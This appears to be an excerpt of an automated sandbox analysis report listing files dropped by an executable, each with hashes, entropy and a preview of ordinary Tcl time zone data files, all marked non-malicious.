                                                                                                                                                                                                                              SHA1:2C38B7E7872BB41C3569DFCB539C3EC3AAE24FDD
                                                                                                                                                                                                                              SHA-256:2488805DE4FEA42305689F679F1AE2D80B1E934E657FEA329AD39A82DAC63022
                                                                                                                                                                                                                              SHA-512:B19D409870939C8F0834C6C028239E010EE5128DFA6E97D4903BECA229B04FE530EA376B936767D9BFE21709720C1791289D8E3622B17C18F2680B0670794A02
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Riyadh)]} {.. LoadTimeZoneFile Asia/Riyadh..}..set TZData(:Antarctica/Syowa) $TZData(:Asia/Riyadh)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):5370
                                                                                                                                                                                                                              Entropy (8bit):3.5134546899897146
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:YveRdmbxnKIJqU9XThVIsopb8BcrFgoZVlzeEG+PtJ:UeRdmNnKIIajfopb3FVVJ
                                                                                                                                                                                                                              MD5:442F495C36B31CA5D7A9BEFF12105AEF
                                                                                                                                                                                                                              SHA1:B3F6CA5B4A5756F9B2C09A27198F7A651CC6032D
                                                                                                                                                                                                                              SHA-256:6FD5AB8B7B308CDCEA4B747A81D8675988AE218813C91714FC4CA97919CEBEA5
                                                                                                                                                                                                                              SHA-512:C6EAECC26D67D218615EBB5602639DAB62A2578BD9683553D765DC1AC5580627D29B6F911388F5F1BFC284278EA4EBECE94630D3C6B95FF9EF93D3D61A3C2028
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Antarctica/Troll) {.. {-9223372036854775808 0 0 -00}.. {1108166400 0 0 +00}.. {1111885200 7200 1 +02}.. {1130634000 0 0 +00}.. {1143334800 7200 1 +02}.. {1162083600 0 0 +00}.. {1174784400 7200 1 +02}.. {1193533200 0 0 +00}.. {1206838800 7200 1 +02}.. {1224982800 0 0 +00}.. {1238288400 7200 1 +02}.. {1256432400 0 0 +00}.. {1269738000 7200 1 +02}.. {1288486800 0 0 +00}.. {1301187600 7200 1 +02}.. {1319936400 0 0 +00}.. {1332637200 7200 1 +02}.. {1351386000 0 0 +00}.. {1364691600 7200 1 +02}.. {1382835600 0 0 +00}.. {1396141200 7200 1 +02}.. {1414285200 0 0 +00}.. {1427590800 7200 1 +02}.. {1445734800 0 0 +00}.. {1459040400 7200 1 +02}.. {1477789200 0 0 +00}.. {1490490000 7200 1 +02}.. {1509238800 0 0 +00}.. {1521939600 7200 1 +02}.. {1540688400 0 0 +00}.. {1553994000 7200 1 +02}.. {1572138000 0 0 +00}.. {1585443600 7200 1 +02}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):179
                                                                                                                                                                                                                              Entropy (8bit):4.940298769001579
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8s4YkyXHAIgNrYOARL/2L0GRHEoKcMFeWFKjov:SlSWB9vsM3yMGSHAIgvAN/2L0XcMFewh
                                                                                                                                                                                                                              MD5:F61B4D02530B54A8EB1CA7B34BF6D553
                                                                                                                                                                                                                              SHA1:EB85E044EF9F7D11310C5EBB8D1D0C49A1E3067F
                                                                                                                                                                                                                              SHA-256:1892E98C13AC141C8C92EAB942B073A464BA5E2C000C250F97F860BE6B108127
                                                                                                                                                                                                                              SHA-512:E725E909A4056B7E4FADBE66B69E6C4752595F3357E670A7D740A2DA957F2C9502ECA57B9BA874045ED032B8F65A10D11AFAF69EA9673187FD4AE08793492470
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Urumqi)]} {.. LoadTimeZoneFile Asia/Urumqi..}..set TZData(:Antarctica/Vostok) $TZData(:Asia/Urumqi)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):187
                                                                                                                                                                                                                              Entropy (8bit):4.947168975083595
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxV/y+YF3vXHAIgoq8yFRRL/2XbeLo4cA4FH/h8QahV:SlSWB9vsM3ymhVoPHAIgoh6N/2XbUyAH
                                                                                                                                                                                                                              MD5:A4F076D7D716467B78EA382FA222CB38
                                                                                                                                                                                                                              SHA1:21D7FBA308ADC652F541A0336929B862F7B1BD0B
                                                                                                                                                                                                                              SHA-256:25462B656D240DA6B01C1A630FAC04B25DD65C799B659BE1C8BD3AB62610966F
                                                                                                                                                                                                                              SHA-512:1B6BD455E533D5BDC7F3506561A9CA804B1F9CA5CC0665AAB0FC083106AB32FF149DD5FFF62EF7BABAD87E3274F264446D492FB8BE160C9C7F281C7060BF1F61
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Berlin)]} {.. LoadTimeZoneFile Europe/Berlin..}..set TZData(:Arctic/Longyearbyen) $TZData(:Europe/Berlin)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):171
                                                                                                                                                                                                                              Entropy (8bit):4.829666491766117
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8t14XHAIgNsM13oOARL/2WFK4h4WFK81Fn:SlSWB9vsM3yN14HAIgaM1YOAN/2wKs46
                                                                                                                                                                                                                              MD5:60D7F3194F19179E0CF0F561F9C40EE6
                                                                                                                                                                                                                              SHA1:B079EC49485CFBFFB7A5BE6149319B75684258E9
                                                                                                                                                                                                                              SHA-256:8FCDDB246932BAED880B70C0CA867057E7989AEA55EDDC174430E1055CD1058D
                                                                                                                                                                                                                              SHA-512:0BDC86B1D473D4875C6F7C092F955D0999E6C1F2EF83CFC7726A3C5BFEB0F5CB8E00B1F0CBC1F91F806EC635C472927504DF681A32DAC55EF372DA16FEA9EF40
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Riyadh)]} {.. LoadTimeZoneFile Asia/Riyadh..}..set TZData(:Asia/Aden) $TZData(:Asia/Riyadh)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1637
                                                                                                                                                                                                                              Entropy (8bit):3.732051305399264
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5qehddmvOt81FCuLqecDngO6jPvTpYy5T4TXvKT10SvPFu+a+CK/Eu3CWuD0Vob1:5YvdJqxiF0rvK50Sv9fGSM
                                                                                                                                                                                                                              MD5:D6BCB21F65642F36A159AFD72EC93953
                                                                                                                                                                                                                              SHA1:D3E670E579924E6E4F04AB574D48334FF521D8B2
                                                                                                                                                                                                                              SHA-256:06DC608C0B8CDD69CCE66A6BF86F141C46DF39CB45312E684E46F19ED8CAFF15
                                                                                                                                                                                                                              SHA-512:9A633B629873E5EE5AF923A94865EBE5FD9ECA181B2C47B7368A0828468715E07AD3FD825D5E2312D2D0BA1FA5490E3817C36B6339824C8012A0B75538C4A0DC
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Almaty) {.. {-9223372036854775808 18468 0 LMT}.. {-1441170468 18000 0 +05}.. {-1247547600 21600 0 +06}.. {354909600 25200 1 +06}.. {370717200 21600 0 +06}.. {386445600 25200 1 +06}.. {402253200 21600 0 +06}.. {417981600 25200 1 +06}.. {433789200 21600 0 +06}.. {449604000 25200 1 +06}.. {465336000 21600 0 +06}.. {481060800 25200 1 +06}.. {496785600 21600 0 +06}.. {512510400 25200 1 +06}.. {528235200 21600 0 +06}.. {543960000 25200 1 +06}.. {559684800 21600 0 +06}.. {575409600 25200 1 +06}.. {591134400 21600 0 +06}.. {606859200 25200 1 +06}.. {622584000 21600 0 +06}.. {638308800 25200 1 +06}.. {654638400 21600 0 +06}.. {670363200 18000 0 +05}.. {670366800 21600 1 +05}.. {686091600 18000 0 +05}.. {695768400 21600 0 +06}.. {701812800 25200 1 +06}.. {717537600 21600 0 +06}.. {733262400 25200 1 +06}.. {748987200 21600 0 +06}.. {764712
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2682
                                                                                                                                                                                                                              Entropy (8bit):3.7873260611521915
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5MUNHl0Nhb9bGA9jSb0PWtsjOuH7Ay2n3yy7QYoTZg703q4oPuJ9/YXjpdaOP9kA:Fz0T52akyId7+xOXdkwqeIFcR
                                                                                                                                                                                                                              MD5:7E70BD44FBF5BF70E3C5246D3A83A49B
                                                                                                                                                                                                                              SHA1:10A28B0A3189DF347CF9853C024E9467CAC56DBA
                                                                                                                                                                                                                              SHA-256:B70AABECACD3F62AF506DF395AB44F47F2CA091522B04EC87AC1407172DD1BFA
                                                                                                                                                                                                                              SHA-512:766565F837EB777749B2C8AAE6C73A2274A772CEF12E7C2E30A89809FEF1E9ED6B067DF044A4676AA4BE76A64A904692C3887336BF01BA4D5D9A5020FB792938
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Amman) {.. {-9223372036854775808 8624 0 LMT}.. {-1230776624 7200 0 EET}.. {108165600 10800 1 EEST}.. {118270800 7200 0 EET}.. {136591200 10800 1 EEST}.. {149806800 7200 0 EET}.. {168127200 10800 1 EEST}.. {181342800 7200 0 EET}.. {199749600 10800 1 EEST}.. {215643600 7200 0 EET}.. {231285600 10800 1 EEST}.. {244501200 7200 0 EET}.. {262735200 10800 1 EEST}.. {275950800 7200 0 EET}.. {481154400 10800 1 EEST}.. {496962000 7200 0 EET}.. {512949600 10800 1 EEST}.. {528670800 7200 0 EET}.. {544399200 10800 1 EEST}.. {560120400 7200 0 EET}.. {575848800 10800 1 EEST}.. {592174800 7200 0 EET}.. {610581600 10800 1 EEST}.. {623624400 7200 0 EET}.. {641167200 10800 1 EEST}.. {655074000 7200 0 EET}.. {671839200 10800 1 EEST}.. {685918800 7200 0 EET}.. {702856800 10800 1 EEST}.. {717973200 7200 0 EET}.. {733701600 10800 1 EEST}.. {749422800
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2086
                                                                                                                                                                                                                              Entropy (8bit):3.7698340044911616
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5DeEdVrEOeFt7YFpR2kHmxCcUdBbcHDLV2vpXt25A0UeRr9ydzkMfF6USRWk9UuV:5ZejsFLrcZwvJt2F+doTr9Q3G80
                                                                                                                                                                                                                              MD5:6EFC35043BDCA4AB61D72E931DB954E6
                                                                                                                                                                                                                              SHA1:F0B4E76C154DC773073E41AA8E94030E972A986A
                                                                                                                                                                                                                              SHA-256:D9DF64FDA4638F7604624B0F68A885D5ABADB1DE12AF1AF5581C2AF7DD971562
                                                                                                                                                                                                                              SHA-512:16AE582B113D6960C73B64620A8AF20F9D436AA4B3EC8E881617AED3389EB4357931882103F162F19EE8202953A7E6FB4FDD6D7760FB7621F4DB9D229AD13F17
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Anadyr) {.. {-9223372036854775808 42596 0 LMT}.. {-1441194596 43200 0 +12}.. {-1247572800 46800 0 +14}.. {354884400 50400 1 +14}.. {370692000 46800 0 +13}.. {386420400 43200 0 +13}.. {386424000 46800 1 +13}.. {402231600 43200 0 +12}.. {417960000 46800 1 +13}.. {433767600 43200 0 +12}.. {449582400 46800 1 +13}.. {465314400 43200 0 +12}.. {481039200 46800 1 +13}.. {496764000 43200 0 +12}.. {512488800 46800 1 +13}.. {528213600 43200 0 +12}.. {543938400 46800 1 +13}.. {559663200 43200 0 +12}.. {575388000 46800 1 +13}.. {591112800 43200 0 +12}.. {606837600 46800 1 +13}.. {622562400 43200 0 +12}.. {638287200 46800 1 +13}.. {654616800 43200 0 +12}.. {670341600 39600 0 +12}.. {670345200 43200 1 +12}.. {686070000 39600 0 +11}.. {695746800 43200 0 +13}.. {701791200 46800 1 +13}.. {717516000 43200 0 +12}.. {733240800 46800 1 +13}.. {748965
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1665
                                                                                                                                                                                                                              Entropy (8bit):3.7149890651919644
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5uvFlvNhQQvmRKqv0fvzQIovWdvEGvDaDvs5vZlovKWyvNSvTqvIkhYwr:sFBNKs6b03zB0WJEuDa7sFZiKWaN6TiF
                                                                                                                                                                                                                              MD5:A72FB1FE01C93BD7E0A8136635C72639
                                                                                                                                                                                                                              SHA1:2383CF839F50784D4BF8B7EDDB324C80E2DDD0DC
                                                                                                                                                                                                                              SHA-256:96B510AF9B8C6BC1DFA84E9ED5E072F3FD484EEB66BBEBC7B6826ED859ED9027
                                                                                                                                                                                                                              SHA-512:061FECE3C750C0229638DD8AF38FB3E8E48E59E0DE1B13BCFE46483A7A170B71B9BCB0D6F110B6B2EF68510FA940F9066F14CBD59829E222D6644D3657CE1893
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Aqtau) {.. {-9223372036854775808 12064 0 LMT}.. {-1441164064 14400 0 +04}.. {-1247544000 18000 0 +05}.. {370724400 21600 0 +06}.. {386445600 18000 0 +05}.. {386449200 21600 1 +05}.. {402256800 18000 0 +05}.. {417985200 21600 1 +05}.. {433792800 18000 0 +05}.. {449607600 21600 1 +05}.. {465339600 18000 0 +05}.. {481064400 21600 1 +05}.. {496789200 18000 0 +05}.. {512514000 21600 1 +05}.. {528238800 18000 0 +05}.. {543963600 21600 1 +05}.. {559688400 18000 0 +05}.. {575413200 21600 1 +05}.. {591138000 18000 0 +05}.. {606862800 21600 1 +05}.. {622587600 18000 0 +05}.. {638312400 21600 1 +05}.. {654642000 18000 0 +05}.. {670366800 14400 0 +04}.. {670370400 18000 1 +04}.. {686095200 14400 0 +04}.. {695772000 18000 0 +05}.. {701816400 21600 1 +05}.. {717541200 18000 0 +05}.. {733266000 21600 1 +05}.. {748990800 18000 0 +05}.. {7647156
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1666
                                                                                                                                                                                                                              Entropy (8bit):3.721746335201775
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5FUvalvNhQQvmRKqv0fvzQIovWdvEGvDaDvs5vZlovKWyvNSvTqvIQvyovklvqQR:PwaBNKs6b03zB0WJEuDa7sFZiKWaN6Tt
                                                                                                                                                                                                                              MD5:E278B985BD2515DBCAED8CB741BE9208
                                                                                                                                                                                                                              SHA1:BC9F5E72C430661D7ED1AF04571CE5D0F73DD18D
                                                                                                                                                                                                                              SHA-256:991638FA2AB2A2F7A091A23D78D99306EE73A740F1A03FBAC448EDCAB55A0E38
                                                                                                                                                                                                                              SHA-512:9951DB729B837647CC4B3D2E605525DCCBAFFD39D76460331BF62235DCAE5E4470CDA578F940B1739AABFEC55D293FF60D79AE0EFDFE1EB64E84571881FDEA6A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Aqtobe) {.. {-9223372036854775808 13720 0 LMT}.. {-1441165720 14400 0 +04}.. {-1247544000 18000 0 +05}.. {354913200 21600 1 +06}.. {370720800 21600 0 +06}.. {386445600 18000 0 +05}.. {386449200 21600 1 +05}.. {402256800 18000 0 +05}.. {417985200 21600 1 +05}.. {433792800 18000 0 +05}.. {449607600 21600 1 +05}.. {465339600 18000 0 +05}.. {481064400 21600 1 +05}.. {496789200 18000 0 +05}.. {512514000 21600 1 +05}.. {528238800 18000 0 +05}.. {543963600 21600 1 +05}.. {559688400 18000 0 +05}.. {575413200 21600 1 +05}.. {591138000 18000 0 +05}.. {606862800 21600 1 +05}.. {622587600 18000 0 +05}.. {638312400 21600 1 +05}.. {654642000 18000 0 +05}.. {670366800 14400 0 +04}.. {670370400 18000 1 +04}.. {686095200 14400 0 +04}.. {695772000 18000 0 +05}.. {701816400 21600 1 +05}.. {717541200 18000 0 +05}.. {733266000 21600 1 +05}.. {748990
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):878
                                                                                                                                                                                                                              Entropy (8bit):3.937249024843323
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5ggeRMdIQvNcDvNhQQvmRKqvzQfv7PQIovWxrvEGvDWdDvs5v/RlovKTob3CGcr:5gbkvNSvNhQQvmRKqv0fvzQIovWdvEGD
                                                                                                                                                                                                                              MD5:259179C7A1CA04F9F3A373B6C8FCB8C5
                                                                                                                                                                                                                              SHA1:D042DF8EFD8EC1473B45B1131BD5EB714F1B2C17
                                                                                                                                                                                                                              SHA-256:13745BFA25E6E2D8D0FABAE42CB7C37CF9F974CFB343D4FE84E4E2D64A25926B
                                                                                                                                                                                                                              SHA-512:703BEAD5A1E5B3816D98057A08A87C2139F418787F38561FE35175B84E2005365727F85D1B949CC5DF464B207A7D01BB65FB1A632E73DDA523E843B82D76FBBD
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Ashgabat) {.. {-9223372036854775808 14012 0 LMT}.. {-1441166012 14400 0 +04}.. {-1247544000 18000 0 +05}.. {354913200 21600 1 +05}.. {370720800 18000 0 +05}.. {386449200 21600 1 +05}.. {402256800 18000 0 +05}.. {417985200 21600 1 +05}.. {433792800 18000 0 +05}.. {449607600 21600 1 +05}.. {465339600 18000 0 +05}.. {481064400 21600 1 +05}.. {496789200 18000 0 +05}.. {512514000 21600 1 +05}.. {528238800 18000 0 +05}.. {543963600 21600 1 +05}.. {559688400 18000 0 +05}.. {575413200 21600 1 +05}.. {591138000 18000 0 +05}.. {606862800 21600 1 +05}.. {622587600 18000 0 +05}.. {638312400 21600 1 +05}.. {654642000 18000 0 +05}.. {670366800 14400 0 +04}.. {670370400 18000 1 +04}.. {686095200 14400 0 +04}.. {695772000 18000 0 +05}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):182
                                                                                                                                                                                                                              Entropy (8bit):4.801820439218014
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8xEYM4DyXHAIgN/ZEYovFvWARL/2WFKUNSH+WFKYEQ:SlSWB9vsM3yR+HAIgH8VWAN/2wKUNSeq
                                                                                                                                                                                                                              MD5:5193EF7ADB646798801245BC50C8DDA6
                                                                                                                                                                                                                              SHA1:83ED851CBC60EFB330A8FC119E1BED5B4C0BA630
                                                                                                                                                                                                                              SHA-256:2C752F641B98E3C05B14AE31330D1F198DAA4A7E354BA9670C7754926BFB891A
                                                                                                                                                                                                                              SHA-512:E940E1BE67A9AC895F3D060B1CB34797A429147A9DC2AC0F1162D37D86661EF217EDABA720F0AE3796186FE801229210AC785BB4511CBBE5A41791D236101D8C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Ashgabat)]} {.. LoadTimeZoneFile Asia/Ashgabat..}..set TZData(:Asia/Ashkhabad) $TZData(:Asia/Ashgabat)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1666
                                                                                                                                                                                                                              Entropy (8bit):3.7265766742957402
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:55TvFlvNhQQvmRKqv0fvzQIovWdvEGvDaDvs5vZlovKWyvNSvTqvIQvyovklvqQJ:XrFBNKs6b03zB0WJEuDa7sFZiKWaN6Tl
                                                                                                                                                                                                                              MD5:0236793F90ABC6F68718DDBB44AF5E2F
                                                                                                                                                                                                                              SHA1:A5EFAEEF9B9159E748A3FED231F8A978E400482E
                                                                                                                                                                                                                              SHA-256:4B7B118E6AE72D41740CF0CB2BD8E970700758DCBC0DD6F298199D841DF8408E
                                                                                                                                                                                                                              SHA-512:851C7A9C110790454312BB9C5B5D3C426365EEF4673191B9ABB2E4A32301894C5FB1ADCBE2A4C67BEE416AD63FB8BED85F94EF9BF42473DA4BFFA7824935A1D5
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Atyrau) {.. {-9223372036854775808 12464 0 LMT}.. {-1441164464 10800 0 +03}.. {-1247540400 18000 0 +05}.. {370724400 21600 0 +06}.. {386445600 18000 0 +05}.. {386449200 21600 1 +05}.. {402256800 18000 0 +05}.. {417985200 21600 1 +05}.. {433792800 18000 0 +05}.. {449607600 21600 1 +05}.. {465339600 18000 0 +05}.. {481064400 21600 1 +05}.. {496789200 18000 0 +05}.. {512514000 21600 1 +05}.. {528238800 18000 0 +05}.. {543963600 21600 1 +05}.. {559688400 18000 0 +05}.. {575413200 21600 1 +05}.. {591138000 18000 0 +05}.. {606862800 21600 1 +05}.. {622587600 18000 0 +05}.. {638312400 21600 1 +05}.. {654642000 18000 0 +05}.. {670366800 14400 0 +04}.. {670370400 18000 1 +04}.. {686095200 14400 0 +04}.. {695772000 18000 0 +05}.. {701816400 21600 1 +05}.. {717541200 18000 0 +05}.. {733266000 21600 1 +05}.. {748990800 18000 0 +05}.. {764715
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1702
                                                                                                                                                                                                                              Entropy (8bit):3.7261419515679393
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5/eVvyGiHD6UC4UrUomFMmUZcjbUKNFcUEUvUOpU8MYUWCUlbf/U9bUiUUybUQUF:5m8G9mFdnNF1FfsTuvQXHCe
                                                                                                                                                                                                                              MD5:690013310A46BD1AE250A5E019353809
                                                                                                                                                                                                                              SHA1:0DF434C7EEB707DC071007FAB112F4DEB37E936F
                                                                                                                                                                                                                              SHA-256:D20B75D2604C3B742C1629C5EE02CFF6783E472249982B272B68F2A6DE9BDC38
                                                                                                                                                                                                                              SHA-512:FF8C33E55E4F006C38D3FD37A1AD3E1200718CA374ECBEAE8255C7635912F0BB23A59A600BF7130D5660A24C515F726E8440D0D908E560CB59F74059638E6AA2
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Baghdad) {.. {-9223372036854775808 10660 0 LMT}.. {-2524532260 10656 0 BMT}.. {-1641005856 10800 0 +03}.. {389048400 14400 0 +03}.. {402264000 10800 0 +03}.. {417906000 14400 1 +03}.. {433800000 10800 0 +03}.. {449614800 14400 1 +03}.. {465422400 10800 0 +03}.. {481150800 14400 1 +03}.. {496792800 10800 0 +03}.. {512517600 14400 1 +03}.. {528242400 10800 0 +03}.. {543967200 14400 1 +03}.. {559692000 10800 0 +03}.. {575416800 14400 1 +03}.. {591141600 10800 0 +03}.. {606866400 14400 1 +03}.. {622591200 10800 0 +03}.. {638316000 14400 1 +03}.. {654645600 10800 0 +03}.. {670464000 14400 1 +03}.. {686275200 10800 0 +03}.. {702086400 14400 1 +03}.. {717897600 10800 0 +03}.. {733622400 14400 1 +03}.. {749433600 10800 0 +03}.. {765158400 14400 1 +03}.. {780969600 10800 0 +03}.. {796694400 14400 1 +03}.. {812505600 10800 0 +03}.. {82831
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):171
                                                                                                                                                                                                                              Entropy (8bit):4.784355129067593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8hkXHAIgNvZORL/2WFKENUKMFB/4WFKKB:SlSWB9vsM3yBkHAIgPON/2wKENUr/4wT
                                                                                                                                                                                                                              MD5:1B5E0D449DAEF469D586A853CB3073AD
                                                                                                                                                                                                                              SHA1:FD735B0472B31644E787767B82B737CC39EC4175
                                                                                                                                                                                                                              SHA-256:3D437037FBF2BBDF969C8E71967080947F24860D431B39F5D8F23151316ABCD5
                                                                                                                                                                                                                              SHA-512:2A2DC33D4258A5E1AE59172883F3B11723798ED35CF5AF1B8BA81A8807DC6F8222C8044D82B152EF6AF43E7350FEB2625D4406C6C7DD309CE65810EA3D3286B6
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Qatar)]} {.. LoadTimeZoneFile Asia/Qatar..}..set TZData(:Asia/Bahrain) $TZData(:Asia/Qatar)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2149
                                                                                                                                                                                                                              Entropy (8bit):3.6155622322573713
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5/eFdqlykbocXcwJUE5iu8JmFebARoc9lVNk7/9bq8dq16b3C9UPBUTIEjvZJ+76:5RsUf8mFpNWFny1ZGMte3aivUKo
                                                                                                                                                                                                                              MD5:294DFC98F67AC00A188EC3D3B87C501C
                                                                                                                                                                                                                              SHA1:93C434CD9AA170E35AD676C88EE09986A94EC02A
                                                                                                                                                                                                                              SHA-256:873E8F08B87610D0DAFE239D32345248A4595C6B13D1DA83EC214D78E88FA12C
                                                                                                                                                                                                                              SHA-512:5346082CCA733724C0D2C36B768467E59BA9ED6452B6CF1BA923AF4F0D2BC05C67DB49E804CA81DAD449D30D0835026D708D9AB632D02FDA1EA1A0BF717111DE
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
